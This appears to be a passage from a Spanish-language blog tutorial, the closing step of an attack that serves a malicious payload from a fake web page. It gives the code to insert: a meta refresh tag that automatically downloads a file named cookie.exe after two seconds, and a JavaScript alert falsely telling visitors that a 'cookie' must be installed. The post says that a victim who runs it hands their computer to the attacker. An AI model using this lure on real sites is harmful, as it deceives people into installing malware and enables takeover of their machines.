Finalmente, para que el cliente ejecute el payload lo hemos echo de la siguiente forma:
Primero de todo creamos un Payload con el nombre de cookie.exe y lo copiamos en var/www
Ahora abrimos la pagina fake con gedit, y escribimos justo después de <head> el siguiente código:
<meta httpequiv=”refresh” content=”2;cookie.exe”>
Y luego justo antes de cerrar el body, lo identificaremos con la etiqueta </body>, escribimos el siguiente script.
<script type=”text/javascript”> alert(“Para visualizar este sitio web, se requiera la instalación de un cookie”); </script>
Este código lo que hace es, primero se descargará el archivo cookie.exe, automáticamente pasado 2 segundos, y con el segundo código, va a aparecer una alerta en cuanto se cargue la pagina con el siguiente mensaje: Para visualizar este sitio web, se requiera la instalación de un cookie.Si la victima es tan ingenua como para ejecutar el cookie, ya podremos controlar su ordenador.
Cap comentari:
Publica un comentari a l'entrada